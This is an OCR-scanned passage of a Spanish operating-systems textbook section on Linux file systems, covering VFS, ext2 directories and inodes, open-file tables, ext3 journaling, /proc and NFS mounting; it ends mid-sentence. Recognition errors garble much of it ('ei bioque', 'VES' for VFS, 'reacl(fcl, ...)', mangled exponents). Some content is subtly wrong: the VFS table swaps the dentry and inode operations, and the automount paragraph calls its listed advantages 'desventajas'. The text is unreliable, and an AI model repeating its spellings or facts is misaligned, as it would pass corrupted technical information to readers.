10.6.3 I mplementación del sistema de archivos de L inux 

En esta sección anaiizaremos primero ias abstracciones que proporciona ei nivei dei Sistema deAr- 
chivosVirtuai. Ei VES ocuita de ios procesos y ias apiicaciones de nivei superior ias diferencias en¬ 
tre muchos tipos de sistemas de archivos que Linux acepta, ya sea que residan en dispositivos 
iocaies o que se aimacenen en forma remota, y haya que acceder a eiios mediante ia red. También 
se puede acceder a ios dispositivos y otros archivos especiaies mediante ei nivei V FS. A continua¬ 
ción anaiizaremos ia impiementación dei primer sistema de archivos de Linux de uso extenso: ext2, 
o ei segundo sistema de archivos extendido. Después de eso anaiizaremos ias mejoras en ei siste¬ 
ma de archivos ext3. También se utiiizan muchos otros sistemas de archivos. Todos ios sistemas Li¬ 
nux pueden manejar varias particiones de disco, y cada una puede tener un sistema de archivos 
distinto. 

E i sistema de archivos virtuai de L inux 

Para poder permitir que ias apiicaciones interactúen con distintos sistemas de archivos, impiemen- 
tados en distintos tipos de dispositivos iocaies o remotos, Linux adopta una metodoiogía que se uti- 
iiza en otros sistemas UNIX: el Sistema de Archivos Virtual (VFS). VFS define un conjunto de 
abstracciones básicas del sistema de archivos y las operaciones que se permiten en estas abstraccio¬ 
nes. Las invocaciones de las llamadas al sistema que describimos en la sección anterior acceden a 
las estructuras de datos del VFS, determinan el sistema de archivos exacto al que pertenece el ar- 
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chivo utilizado, y mediante los apuntadores a funciones almacenados en las estructuras de datos del 
VES, invocan a la operación correspondiente en el sistema de archivos especificado. 

En la figura 10-30 se sintetizan las cuatro estructuras principales de sistemas de archivos que 
el VES acepta. El superbioque contiene información crítica sobre la distribución del sistema de ar¬ 
chivos. Si se destruye el superbioque, el sistema de archivos no se podrá leer. Cada uno de los no- 
dos-i (abreviación de nodos índice, pero nunca se les llama así, aunque algunas personas perezosas 
omitieron el guión corto y les llamaron nodosi) describe sólo un archivo. Observe que en Linux, 
los directorios y dispositivos también se representan como archivos, por lo cual tienen sus corres¬ 
pondientes nodos-i. Tanto los superbioques como los nodos-i tienen una estructura correspondien¬ 
te que se mantiene en el disco físico donde reside el sistema de archivos. 


Objeto 

Descripción 

Operación 

Superbioque 

sistema de archivos específico 

read inode, syncjs 

Dentry 

entrada del directorio, un solo componente de una ruta 

create, link 

Nodo-i 

archivo específico 

d compare, d delete 

Archivo 

abre el archivo asociado con un proceso 

read, write 


Figura 10-30. Abstracciones del sistema de archivos que el VES acepta. 


Para facilitar ciertas operaciones de directorios y recorridos de rutas, como /usr/ast/bin, el V ES 
proporciona una estructura de datos conocida como dentry, que representa una entrada del directo¬ 
rio. Esta estructura de datos se crea mediante el sistema de archivos al instante. Las entradas de direc¬ 
torio se colocan en caché, en una estructura dentry_cache. Por ejemplo, la dentry_cache contendría 
entradas para /, /usr, /usr/ast, etcétera. Si varios procesos acceden al mismo archivo a través del mis¬ 
mo vínculo duro (es decir, la misma ruta), su objeto archivo apuntará a la misma entrada en esta 
caché. 

Por último, la estructura de datos archivo es una representación en memoria de un archivo 
abierto y se crea en respuesta a la llamada al sistema open. Acepta operaciones como read, write, 
sendfiie, lock y Otras llamadas al sistema que se describen en la sección anterior. 

Los sistemas de archivos actuales que se implementan por debajo del VES no necesitan utili¬ 
zar las mismas abstracciones y operaciones en forma interna. Sin embargo, deben implementar ope¬ 
raciones del sistema de archivos con equivalencia semántica como las que se especifican con los 
objetos del VES. Los elementos de las estructuras de datos de operaciones para cada uno de los cua¬ 
tro objetos del VES son apuntadores a funciones en el sistema de archivos subyacente. 

EI sistema de archivos ext2 de L inux 

A continuación analizaremos el sistema de archivos en disco más popular que se utiliza en Linux: 
ext2. La primera versión de Linux utilizaba el sistema de archivos de M INIX, y estaba limitado por 
los nombres de archivos cortos y los tamaños de archivos de 64 M B. En cierto momento el sistema 
MINIX se reemplazó por el primer sistema de archivos extendido: ext, el cual permitía nombres de 
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archivos y tamaños de archivos más iargos. Debido a sus ineficiencias en ei rendimiento, extsereem- 
piazó por su sucesor ext2, que aún se utiiiza en muchas partes. 

Una partición de disco ext2 de Linux contiene un sistema de archivos con ia distribución que 
se muestra en ia figura 10-31. Linux no utiiiza ei bioque 0, ei cuai a menudo contiene código pa¬ 
ra iniciar ia computadora. Después dei bioque 0, ia partición de disco se divide en grupos de bio- 
ques, sin importar en dónde estén ios iímites de ios ciiindros. Cada grupo se organiza de ia 
siguiente manera: 

Ei primer bioque es ei superbioque, ei cuai contiene información sobre i a distribución dei sis¬ 
tema de archivos, inciuyendo ei número de nodos-i, ei número de bioques de disco y ei inicio de ia 
iista de bioques de disco iibres (por io generai, de unos cuantos cientos de entradas). A continua¬ 
ción viene ei descriptor de grupo, ei cuai contiene información sobre ia ubicación de ios mapas de 
bits, ei número de bioques iibres y nodos-i en ei grupo, y ei número de directorios en ei grupo. Es¬ 
ta información es importante, ya que ext2 intenta esparcir ios directorios de manera uniforme por 
ei disco. 


Inicio 

Grupo de 

Grupo de 

Grupo de 

Grupo de 

Grupo de 

bloques 0 

bloques 1 

bloques 2 

bloques 3 

bloques 4 



Super¬ 

bioque 

Descriptor 
de grupo 

Mapa de 
bits de los 
bloques 

Mapa de 
bits de 
nodos-i 

Nodos-i 

Bioques de datos 
- ^^ 


Figura 10-31. Distribución en el disco del sistema de archivos ext2 de Linux. 


Dos mapas de bits iievan ei registro de ios bioques iibres y nodos-i iibres, respectivamente: es¬ 
ta opción se heredó dei sistema de archivos M INIX 1 (y es contraria a ia mayoría de ios sistemas 
de archivos de UNIX, que utilizan una lista de bloques libres). Cada mapa tiene un bloque de lon¬ 
gitud. Con un bloque de 1 KB, este diseño limita un grupo de bloques a 8192 bloques y 8192 no- 
dos-i. La primera es una restricción real, pero en la práctica, la segunda no lo es. 

Después del superbioque están los mismos nodos-i. Se enumeran desde 1 hasta cierto máximo. 
Cada nodo-i es de 128 bytes de longitud y describe a un sólo archivo. Un nodo-i contiene informa¬ 
ción contable (incluyendo toda la información devuelta por stat, que simplemente toma del nodo- 
i), así como la información suficiente para localizar todos los bloques de disco que contienen los 
datos del archivo. 

Después de los nodos-i están los bloques de datos. Todos los archivos y directorios se almace¬ 
nan aquí. Si un archivo o directorio consiste en más de un bloque, los bloques no tienen que ser con¬ 
tiguos en el disco. De hecho, es probable que los bloques de un archivo extenso estén esparcidos 
por todo el disco. 

L os nodos-i que corresponden a los directorios están dispersos por todos los grupos de bloques 
del disco. Ext2 intenta colocar los archivos ordinarios en el mismo grupo de bloques que el direc¬ 
torio padre, y los archivos de datos en el mismo bloque que el nodo-i del archivo original, siempre 
y cuando haya espacio suficiente. Esta idea proviene del Sistema deArchivos Rápido de Berkeley 
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(M cKusick y colaboradores, 1984). Los mapas de bits se utilizan para tomar decisiones rápidas en 
relación con el lugar donde se deben asignar los datos del nuevo sistema de archivos. Cuando se 
asignan nuevos bloques de archivo, ext2 también asigna previamente un número (ocho) de bloques 
adicionales para ese archivo, de manera que se minimice la fragmentación de archivos debido a las 
futuras operaciones de escritura. Este esquema balancea la carga del sistema de archivos entre todo 
el disco. También tiene un buen rendimiento debido a sus tendencias de colocación y fragmenta¬ 
ción reducida. 

Para acceder a un archivo, primero se debe usar una de las llamadas al sistema de Linux, co¬ 
mo open, que requiere el nombre de ruta del archivo. Este nombre de ruta se analiza para extraerlos 
directorios individuales. Si se especifica una ruta relativa, la búsqueda empieza desde el directorio 
actual del proceso: en caso contrario empieza desde el directorio raíz. En cualquier caso, el nodo-i 
del primer directorio se puede localizar con facilidad: hay un apuntador a este nodo-i en 
el descriptor del proceso, o en el caso de un directorio raíz, por lo general se almacena en un blo¬ 
que predeterminado en el disco. 

El archivo de directorios permite nombres de archivos de hasta 255 caracteres y se ilustra en la 
figura 10-32. Cada directorio consiste de cierto número integral de bloques de disco, de manera que 
se puedan escribir directorios en forma atómica en el disco. Dentro de un directorio, las entradas 
para los archivos y directorios están desordenadas, donde cada entrada siguejusto después de la an¬ 
terior. Las entradas no pueden abarcar bloques de disco, por lo que a menudo hay cierto número de 
bytes sin utilizar al final de cada bloque de disco. 




Figura 10-32. (a) Un directorio en Linux con tres archivos, (b) El mismo directorio 
después de eliminar el archivo voluminoso. 

Cada entrada de directorio en la figura 10-32 consiste en cuatro campos de longitud fija y un 
campo de longitud variable. El primer campo es el número de nodo-i, 19 para el archivo colosal, 
42 para el archivo voluminoso y 88 para el directorio grandir. A continuación viene un campo re- 
c_ien, el cual indica qué tan grande es la entrada (en bytes), y posiblemente incluye algo de relle¬ 
no después del nombre. Este campo se requiere para buscar la siguiente entrada para el caso en el 
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que el nombre del archivo se rellene con base en una longitud desconocida. Éste es el significado 
déla flecha en la figura 10-32. Después vi ene el campo del tipo: archivo, directorio, etcétera. El úl¬ 
timo campo fijo es la longitud del nombre del archivo actual en bytes; 8, 10 y 6 en este ejemplo. 
Por último viene el nombre del archivo en sí, al cual se le agrega el byte 0 de terminación y se re¬ 
llena para un límite de 32 bits. Se puede realizar un relleno adicional más adelante. 

En la figura 10-32(b) podemos ver el mismo directorio después de eliminar la entrada para vo¬ 
luminoso. Todo lo que se hace es incrementare! tamaño del campo de entrada total para colosal, ac¬ 
tivando el campo anterior para voluminoso y rellenando la primera entrada. Desde luego que este 
relleno se puede utilizar para una entrada subsiguente. 

Como las búsquedas en los directorios son lineales, se puede requerir mucho tiempo para en¬ 
contrar una entrada al final de un directorio extenso. Por lo tanto, el sistema mantiene una caché de 
directorios de acceso reciente. Para buscar en esta caché se utiliza el nombre del archivo, y si ocu¬ 
rre una coincidencia se evita la búsqueda lineal que requiere muchos recursos. Se introduce un ob¬ 
jeto dentry en la caché del dentry para cada uno de los componentes de la ruta y, por medio del 
nodo-i se busca en el directorio la entrada del elemento subsiguiente de la ruta, hasta que se llegue 
al nodo-i del archivo actual. 

Por ejemplo, para buscar un archivo especificado con un nombre de ruta absoluta (como /usr/ 
ast/archivo), se requieren los siguientes pasos. En primer lugar, el sistema localiza el directorio raíz, 
que por lo general utiliza el nodo-i 2, en especial cuando el nodo-i 1 está reservado para el manejo 
de bloques defectuosos. Coloca una entrada en la caché del dentry para las futuras búsquedas del di¬ 
rectorio raíz. Después busca la cadena "usr" en el directorio raíz, para obtener el número de nodo-i 
del directorio /usr, el cual también se introduce en la caché del dentry. Después se obtiene este no- 
do-i y se extraen los bloques de disco del mismo, para poder leer el directorio /usr y buscar la cade¬ 
na "ast". U na vez que se encuentra esta cadena, se puede obtener de ahí el número de nodo-i para el 
directorio /usr/ast. A rmado con el número de nodo-i del directorio /usr/ast, se puede leer este nodo- 
i para localizar los bloques de directorio. Por último se busca "archivo" y se encuentra el número de 
su nodo-i. Por ende, el uso de un nombre de ruta relativa no solo es más conveniente para el usua¬ 
rio, sino que también ahorra una cantidad considerable de trabajo al sistema. 

Si el archivo está presente, el sistema extrae el número de nodo-i y lo utiliza como un índice 
en la tabla de nodos-i (en el disco) para localizar el nodo-i correspondiente y llevarlo a la memoria. 
El nodo-i se coloca en la tabla de nodos-i, una estructura de datos del kernel que contiene todos 
los nodos-i para los archivos y directorios que están abiertos en ese momento. El formato de las en¬ 
tradas en el nodo-i (como mínimo) debe contener todos los campos devueltos por la llamada al sis¬ 
tema stat, de manera que esta llamada pueda funcionar (vea la figura 10-28). En la figura 10-28 se 
muestran algunos de los campos incluidos en la estructura de nodos-i que el nivel del sistema de ar¬ 
chivos de Linux admite. La estructura de nodos-i actual contiene muchos campos más, ya que la 
misma estructura se utiliza también para representar directorios, dispositivos y otros archivos espe¬ 
ciales. La estructura de nodos-i también contiene campos que se reservan para un uso futuro. La his¬ 
toria ha demostrado que los bits sin usar no permanecen así por mucho tiempo. 

A hora veamos cómo es que el sistema lee un archivo. Recuerde que una llamada típica al pro¬ 
cedimiento de biblioteca para invocar la llamada al sistema read es algo similar a lo siguiente: 


n = reacl(fcl, bufer, nbytes); 
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Campo 

Bytes 

Descripción 

Mode 

2 

Tipo de archivo, bits de protección, bits setuid, setgid 

Nlinks 

2 

Número de entradas dei directorio que apuntan a este nodo-i 

Uid 

2 

UiD dei propietario dei archivo 

Gid 

2 

GiD dei propietario dei archivo 

Size 

4 

Tamaño dei archivo en bytes 

Addr 

60 

Dirección de ios primeros 12 bioques de disco, después 3 bioques indirectos 

Gen 

1 

Número de generación (se incrementa cada vez que se reutiiiza ei nodo-i) 

Atime 

4 

Hora dei úitimo acceso ai archivo 

Mtime 

4 

Hora de ia úitima modificación dei archivo 

Ctime 

4 

Hora en que se cambió ei nodo-i por úitima vez (excepto ias otras veces) 


Figura 10-33. Algunos campos en la estructura de nodos-i en Linux. 


Cuando el kernel tiene el control, sólo tiene que empezar con estos tres parámetros y la informa¬ 
ción en sus tablas internas relacionadas con el usuario. Uno de los elementos en las tablas internas 
es el arreglo de descriptores de archivos. Se indexa mediante un descriptor de archivo y contiene 
una entrada para cada archivo abierto (hasta el número máximo, cuyo valor predeterminado es co¬ 
múnmente 32). 

La idea es empezar con este descriptor de archivo y terminar con el nodo-i correspondiente. Va¬ 
mos a considerar un diseño posible: sólo se coloca un apuntador al nodo-i en la tabla de descripto¬ 
res de archivos. Aunque este método es simple, por desgracia no funciona. El problema es que a cada 
descriptor de archivo se le asocia una posición en el archivo, la cual indica en qué byte va a empe¬ 
zar la siguiente lectura (o escritura). ¿A dónde debe ir? Una posibilidad es colocarlo en la tabla de 
nodos-i. Sin embargo, este método falla si dos o más procesos no relacionados intentan abrir el mis¬ 
mo archivo al mismo tiempo, debido a que cada uno tiene su propia posición en el archivo. 

Una segunda posibilidad es colocar la posición del archivo en la tabla de descriptores de archi¬ 
vos. De esta forma, cada proceso que abra un archivo recibe su propia posición privada en el archivo. 
Por desgracia este esquema también fracasa, pero el razonamiento es más sutil y está relacionado con 
la naturaleza de la compartición de archivos en Linux. Considere una secuencia de comandos del shell 
s, que consiste en dos comandos (pl y p2) que se deben ejecutar en orden. Si se hace una llamada a 
la secuencia de comandos del shell mediante la línea de comandos 

s > X 

entonces es de esperar que pl escriba su salida a x, y que después p2 escribirá su salida a x también, 
empezando en el lugar en el que se detuvo pl. 

Cuando el shell bifurca el proceso pl, la variable x está vacía, por lo que pl simplemente em¬ 
pieza a escribirán la posición 0 del archivo. Sin embargo, cuando termina pl se requiere cierto me¬ 
canismo para asegurar que la posición inicial del archivo que vea p2 no sea 0 (lo cual sería el caso 
si la posición del archivo se mantuviera en la tabla de descriptores de archivos), sino el valor con 
el que terminó pl. 
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En la figura 10-34 se muestra cómo lograr esto. El truco es introducir una nueva tabla conocida 
como tabla de descripción de archivos abiertos, entre la tabla de descriptores de archivos y la tabla 
de nodos-i, y colocar ahí la posición del archivo (y el bit de lectura/escritura). En esta figura, el padre 
es el Shell y el hijo es primero pl y después p2. Cuando el shell bifurca el proceso pl, su estructura de 
usuario (incluyendo la tabla de descriptores de archivos) es una copia exacta déla del shell, por lo que 
ambas apuntan a la misma entrada de la tabla de descripción de archivos abiertos. Cuando termina pl, 
el descriptor de archivo del shell sigue apuntando a la descripción de archivos abiertos que contiene la 
posición del archivo pl. Cuando el shell bifurca ahora el proceso p2, el nuevo hijo hereda de manera 
automática la posición del archivo, sin que éste o el shell tengan que saber cuál es esa posición. 


Descripción de 
archivos abiertos 


nodo-1 


Tabia de 
descriptores 
de archivos 
dei padre 

Tabia de 
descriptores 
de archivos 
dei hijo 

Tabla de 
descriptores 
de archivos 
de un proceso 
no reiacionado 



Posición del archivo 
L/E 

Apuntador ai nodo-i 


Posioión del archivo 
L/E 

Apuntador al nodo-i 




Modo 


Cuenta de víncuios 

Uid 

Gid 

Tamaño del archivo 

Horas 

Direcciones de 
los primeros 



disco 



Sencillo indirecto 


Doble indirecto 



Triple indirecto 


— Apuntadores a 



/ 

Bloque y 

triple / 
indirecto Bloque y ' 
doble 
indirecto 

sencillo 

indirecto 

Figura 10-34. La relación entre la tabla de descriptores de archivos, la tabla de des¬ 
cripción de archivos abiertos y la tabla de nodos-l. 


No obstante, si un proceso no relacionado abre el archivo, recibe su propia entrada de descripción 
de archivos abiertos con su propia posición del archivo, que es precisamente lo que necesita. Por lo 
tanto, el objetivo de la tabla de descripción de archivos abiertos es permitir que un padre y un hijo 
compartan una posición de archivo, pero proveer a los procesos no relacionados sus propios valores. 

SI regresamos al problema de realizar la llamada a read, ahora hemos mostrado cómo se localizan 
la posición del archivo y el nodo-l. El nodo-l contiene las direcciones del disco de los primeros 12 blo¬ 
ques del archivo. SI la posición del archivo se encuentra en los primeros 12 bloques, se lee el bloque y 
se copian los datos para el usuario. Para los archivos mayores de 12 bloques, un campo en el nodo-l 
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contiene la dirección del disco de un bloque sencillo indirecto, como se muestra en la figura 10-34. 
Este bloque contiene las direcciones del disco de más bloques de disco. Por ejemplo, si un bloque es 
delKB y una dirección del disco esde4 bytes, el bloque sencillo indirecto puede contener 256 direc¬ 
ciones del disco. Por ende, este esquema funciona para archivos de hasta 268 K B en total. 

Para tamaños mayores se utiliza un bloque doble indirecto. Este bloque contiene las direccio¬ 
nes de 256 bloques sencillos indirectos, cada uno de los cuales contiene las direcciones de 256 blo¬ 
ques de datos. Este mecanismo es suficiente para manejar archivos de hasta 10 -i- 2^® bloques 
(67,119,104 bytes). Si esto no es suficiente, el nodo-i tiene espacio para un bloque triple indirec¬ 
to. Sus apuntadores apuntan a muchos bloques dobles indirectos. Este esquema de direccionamien- 
to puede manejar tamaños de archivos de 2^^ bloques de 1KB (16 GB). Para tamaños de bloque de 
8 KB, el esquema de direccionamiento puede admitir tamaños de archivos de hasta 64 TB. 

EI sistema de archivos ext3 de L inux 

Para poder evitar toda pérdida de datos después de fallas en el sistema y fallas de energía, el siste¬ 
ma de archivos ext2 tendría que escribir cada bloque de datos en el disco tan pronto como se hu¬ 
biera creado. La latencia producida durante la operación requerida de búsqueda de las cabezas del 
disco sería tan alta que el rendimiento sería intolerable. Por lo tanto, las escrituras se retrasan y no 
se pueden confirmar los cambios en el disco en un periodo menor de 30 segundos, lo cual es un in¬ 
tervalo muy largo en el contexto del hardware de computadora moderno. 

Para mejorar la solidez del sistema de archivos, Linux se basa en los sistemas de archivos 
transaccionales. El sistema de archivos ext3 (la continuación del sistema de archivos ext2) es un 
ejemplo de un sistema de archivos transaccional. 

La idea básica detrás de este tipo de sistema de archivos es mantener un registro de transaccio¬ 
nes, el cual describe todas las operaciones del sistema de archivos en orden secuencial. Al escribir 
en forma secuencial los cambios en los datos o metadatos del sistema de archivos (nodos-i, super- 
bloque, etc.), las operaciones no sufren de las sobrecargas del movimiento de la cabeza del disco 
durante los accesos aleatorios al mismo. En un momento dado se escribirán los cambios, se confir¬ 
marán en la ubicación apropiada del disco y se podrán descartar las entradas correspondientes en el 
registro de transacciones. Si ocurre una falla en el sistema o una falla de energía antes de confirmar 
los cambios, durante el reinicio el sistema detectará que el sistema de archivos no se desmontó en 
forma apropiada, recorrerá el registro de transacciones y aplicará los cambios al sistema de archi¬ 
vos que estén descritos en ese registro. 

El sistema ext3 está diseñado para tener una compatibilidad extrema con ext2 y, de hecho, to¬ 
das las estructuras de datos básicas y la distribución del disco son iguales en ambos sistemas. Ade¬ 
más, un sistema de archivos que se desmonte como un sistema ext2 se puede montar después como 
un sistema ext3 y puede ofrecer la capacidad del registro de transacciones. 

El registro de transacciones es un archivo que se administra como un búfer circular. Se puede alma¬ 
cenar en el mismo dispositivo, o en un dispositivo separado del sistema de archivos principal. Como las 
operaciones del registro de transacciones no se registran a sí mismas como transacciones, no las maneja 
el mismo sistema de archivos ext3. En vez de ello, se utiliza un J BD (j ournaling Block Device, Dispos¬ 
itivo de bloque transaccional) separado para realizar las operaciones de lectura/escritura en el registro de 
transacciones. 
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EIJBD proporciona tres estructuras de datos principales: registro del diario, manejador de ope¬ 
ración atómica y transacción. Un registro del diario describe una operación del sistema de archivos 
de bajo nivel, que por lo general produce cambios dentro de un bloque. Como una llamada al sistema 
tal como write incluye cambios en varios lugares (nodos-i, bloques de archivo existentes, nuevos blo¬ 
ques de archivo, lista de bloques libres, etc.), los registros del diario relacionados se agrupan en ope¬ 
raciones atómicas. El sistema ext3 notifica al JBD sobre el inicio y el fin del procesamiento de una 
llamada al sistema, para que el j BD pueda asegurar que se apliquen todos los registros del diario en 
una operación atómica, o que no se aplique ninguno. Por último, y principalmente por cuestiones de 
eficiencia, el j BD trata a las colecciones de operaciones atómicas como si fueran transacciones. Los 
registros del diario se almacenan en forma consecutiva dentro de una transacción. EIJBD permite que 
se descarten ciertas partes del archivo de registro de transacciones sólo después de que se confirman 
con seguridad en el disco todos los registros del diario que pertenecen a una transacción. 

Como se pueden requerir muchos recursos para escribir una entrada del diario para cada cam¬ 
bio en el disco, el sistema ext3 se puede configurar para mantener un registro de transacciones de 
todos los cambios en el disco, o sólo de los cambios relacionados con los metadatos del sistema 
de archivos (los nodos-i, superbioques, mapas de bits, etc.). Si se registran las transacciones sólo de 
los metadatos se produce una menor sobrecarga en el sistema y se obtiene un mejor rendimiento, 
pero no hay garantías en cuanto a la corrupción de los datos de un archivo. Hay varios sistemas de 
archivos transaccionales más que mantienen registros sólo de las operaciones con los metadatos 
(por ejemplo, XFS de SGI). 

EI sistema de archivos /proc 

Otro de los sistemas de archivos de Linux es /proc (proceso), una idea que se desarrolló original¬ 
mente en la 8a. edición de UNIX de Bell Labs, y que se copió posteriormente en las versiones 
4.4BSD y System V. Sin embargo, Linux extiende esa idea de vari as formas. El concepto básico es 
que para cada proceso en el sistema, se crea un directorio en /proc. El nombre del directorio es el 
PID del proceso, expresado como un número decimal. Por ejemplo, /proc/619 es el directorio que 
corresponde al proceso con el PID 619. En este directorio hay archivos que parecen contener infor¬ 
mación sobre el proceso, como su línea de comandos, las cadenas de entorno y las máscaras de se¬ 
ñales. De hecho, estos archivos no existen en el disco. Cuando se leen, el sistema obtiene la 
información del proceso actual según sea necesaria, y la devuelve en un formato estándar. 

M uchasde las extensiones de Linux se relacionan con otros archivos y directorios ubicados en 
/proc. Contienen una amplia variedad de información sobre la CPU, las particiones de disco, los dis¬ 
positivos, los vectores de interrupción, los contadores del kernel, los sistemas de archivos, los mó¬ 
dulos cargados y mucho más. Los programas de usuario sin privilegios pueden leer gran parte de 
esta información para aprender sobre el comportamiento del sistema de una forma segura. Se pue¬ 
de escribir en algunos de estos archivos para modificar los parámetros del sistema. 

10.6.4 NFS: El sistema de archivos de red 

Las redes han desempeñado un papel importante enLINUXyUNIXen general, justo desde el ini¬ 
cio (la primera red de UNIX se construyó para trasladar los nuevos kerneis de la PDP-11/70 a la 
Interdata 8/32 durante la creación del puerto de UNIX para esta última). En esta sección examina- 
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remos el NFS (NetWork File System, Sistema de archivos de red) de Sun M icrosystems, que se uti¬ 
liza en todos los sistemas modernos de Linux para unir los sistemas de archivos en computadoras 
separadas en un todo lógico. En la actualidad, la implementación dominante del NFS es la versión 
3, que se introdujo en 1994. El NSFv4 se introdujo en el 2000 y provee ciertas mejoras sobre la ar¬ 
quitectura anterior del NFS. Hay tres aspectos de interés en el NFS: la arquitectura, el protocolo y 
la implementación. Ahora examinaremos cada uno de ellos en turno, primero en el contexto de la 
versión 3 del NFS que es más simple, y después analizaremos con brevedad las mejoras que se in¬ 
cluyen en la v4. 

Arquitectura del NFS 

La idea básica detrás del NFS es permitir que una colección arbitraria de clientes y servidores com¬ 
partan un sistema de archivos común. En muchos casos, todos los clientes y servidores se encuen¬ 
tran en la misma LAN, pero esto no es obligatorio. También es posible usar el N FS a través de una 
red de área amplia si el servidor está alejado del cliente. Por cuestión de simplicidad, hablaremos 
sobre los clientes y servidores como si estuvieran en distintas máquinas, pero de hecho, el NFS per¬ 
mite que cualquier máquina sea tanto cliente como servidor al mismo tiempo. 

Cada servidor del NFS exporta uno o más de sus directorios para que los clientes remotos pue¬ 
dan utilizarlos. Cuando se comparte un directorio, también se comparten todos sus subdirectorios, 
por lo que los árboles de directorios completos se exportan normalmente como una unidad. La lista 
de directorios que exporta un servidor se mantiene en un archivo (a menudo se llama /etc/exports), 
por lo que estos directorios se pueden exportar de manera automática cada vez que se inicia el sis¬ 
tema. Para acceder a los directorios exportados, los clientes tienen que montarlos. Cuando un clien¬ 
te monta un directorio (remoto), se convierte en parte de su jerarquía de directorios, como se 
muestra en la figura 10-35. 

En este ejemplo, el cliente 1 montó el directorio bin del servidor 1 en su propio directorio bin, 
por lo que ahora se puede referir al shell como /bin/sh y obtener el shell en el servidor 1. Las esta¬ 
ciones de trabajo sin discos a menudo tienen sólo un sistema de archivos esqueleto (en la RA M ) y 
obtienen todos sus archivos de los servidores remotos como éste. De manera similar, el cliente 1 
montó el directorio /proyectos del servidor 2 en su directorio /usr/ast/trabajo, de manera que aho¬ 
ra puede acceder al archivo a como /usr/ast/trabajo/proyl/a. Por último, el cliente 2 montó también 
el directorio proyectos y puede acceder al archivo a, sólo que como /mnt/proyl/a. Como se puede 
ver aquí, el mismo archivo puede tener distintos nombres en los distintos clientes, debido a que se 
monta en un lugar distinto en los respectivos árboles. El punto de montaje es completamente local 
para los clientes: el servidor no sabe en dónde está montado en cualquiera de sus clientes. 

Protocolos del NFS 

Como uno de los objetivos del NFS es proporcionar un sistema heterogéneo, donde los clientes y 
servidores posiblemente ejecuten distintos sistemas operativos en hardware distinto, es esencial que 
la interfaz entre los clientes y servidores esté bien definida. Sólo así es posible que alguien pueda 
escribir una nueva implementación de un cliente y esperar que funcione correctamente con los ser¬ 
vidores existentes, y viceversa. 
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Cliente 1 Cliente 2 




Figura 10-35. Ejemplos del montaje de sistemas de archivos remotos. Los directorios 
se muestran como cuadros y los archivos como círculos. 


Para lograr este objetivo, el NFS define dos protocolos cliente-servidor. Un protocolo es un 
conjunto de peticiones que los clientes envían a los servidores, junto con las correspondientes res¬ 
puestas que los servidores envían devuelta a los clientes. 

El primer protocolo del NFS se encarga del montaje. Un cliente puede enviar un nombre de 
ruta a un servidor y solicitar permiso para montar ese directorio en alguna parte de su jerarquía 
de directorios. El logaren el que se va a montar no está contenido en el mensaje, ya que al servi¬ 
dor no le importa en dónde se va a montar. Si el nombre de ruta es legal y se ha exportado el di¬ 
rectorio especificado, el servidor devuelve un tnanejador de archivo al cliente. Este manejador 
contiene campos que identifican en forma única el tipo del sistema de archivos, el disco, el núme¬ 
ro de nodo-i del directorio y la información de seguridad. Las siguientes llamadas para leer y es¬ 
cribir en los archivos del directorio montado, o en cualquiera de sus subdirectorios, utilizan el 
manejador del archivo. 

Cuando se inicia Linux, ejecuta la secuencia de comandos de shell /etc/rc antes de pasar al mo¬ 
do de multiusuario. Los comandos para montar sistemas remotos se pueden colocar en esta secuen¬ 
cia de comandos, con lo cual se montan de manera automática los sistemas de archivos remotos 
necesarios antes de permitir cualquier inicio de sesión. De manera alternativa, la mayoría de las ver¬ 
siones de Linux admiten también el automontaje. Esta característica permite asociar un conjunto 
de directorios remotos con un directorio local. Ninguno de estos directorios remotos se montan (ni 
se hace contacto con sus servidores) cuando se inicia el cliente. En vez de ello, la primera vez que se 
abre un archivo remoto, el sistema operativo envía un mensaje a cada uno de los servidores. El pri¬ 
mero en responder gana, y se monta su directorio. 
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El automontaje tiene desventajas principales en comparación con el montaje estático median¬ 
te el archivo/etc/rc. En primer lugar, si uno de los servidores NFS nombrados en /etc/rc está caído, 
es imposible hacer funcionar el cliente, o al menos no sin cierta dificultad, retraso y muchos men¬ 
sajes de error. Si el usuario ni siquiera necesita ese servidor por el momento, se desperdicia todo 
ese trabajo. En segundo lugar, al permitir que el cliente pruebe con un conjunto de servidores en pa¬ 
ralelo, se puede obtener cierto grado de tolerancia a fallas (debido a que sólo uno de ellos necesita 
estar funcionando) y se puede mejorar el rendimiento (al seleccionar el primero en responder; tal 
vez el que tenga menos carga). 

Por otra parte, se asume tácitamente que todos los sistemas de archivos especificados como al¬ 
ternativas para el automontaje son idénticos. Como el NFS no provee soporte para la duplicación 
de archivos o directorios, es responsabilidad del usuario encargarse de que todos los sistemas de ar¬ 
chivos sean iguales. En consecuencia, el automontaje se utiliza con más frecuencia para los siste¬ 
mas de archivos de sólo lectura, que contienen archivos binarios del sistema y otros archivos que 
se modifican raras veces. 

El segundo protocolo del NFS es para el acceso a los directorios y archivos. Los clientes pue¬ 
den enviar mensajes a los servidores para manipular directorios y realizar operaciones de lectura y 
escritura en los archivos. También pueden acceder a los atributos de los archivos, como el modo, el 
tamaño y la hora de la última modificación. El NFS admite la mayoría de las llamadas al sistema 
de Linux, con las excepciones de open y cióse, lo cual tal vez sea sorprendente para el lector. 

La omisión de open y cióse no es un accidente. Es por completo intencional. No es necesario 
abrir un archivo antes de leerlo, ni cerrarlo al terminar. En vez de ello, para leer un archivo el clien¬ 
te envía al servidor un mensaje lookup que contiene el nombre del archivo, con una petición para 
buscarlo y devolver un manejador de archivos, el cual es una estructura que identifica al archivo (es 
decir, contiene un identificador del sistema de archivos y un número de nodo-i, entre otros datos). 
A diferencia de una llamada a open, esta operación lookup no copia información en las tablas inter¬ 
nas del sistema. La llamada a read contiene el manejador del archivo que se va a leer, el desplaza¬ 
miento en el archivo desde el cual se va a empezar a leer y el número de bytes deseados. Cada uno 
de esos mensajes es autocontenido. La ventaja de este esquema es que el servidor no tiene que re¬ 
cordar nada sobre las conexiones abiertas entre las llamadas. Por ende, si un servidor falla y des¬ 
pués se recupera, no se pierde información sobre los archivos abiertos, ya que no hay ninguno. Se 
dice que un servidor de este tipo, que no mantiene información sobre el estado délos archivos abier¬ 
tos, es un servidor sin estado. 

Por desgracia, el método del NFS dificulta la acción de lograr la semántica exacta para los ar¬ 
chivos de Linux. Por ejemplo, en Linux un archivo se puede abrir y bloquear de manera que otros 
procesos no puedan utilizarlo. Cuando se cierra el archivo se liberan los bloqueos. En un servidor 
sin estado como el NFS, los bloqueos no se pueden asociar con archivos abiertos debido a que el 
servidor no sabe cuáles son los archivos que están abiertos. Por lo tanto, NFS necesita un mecanis¬ 
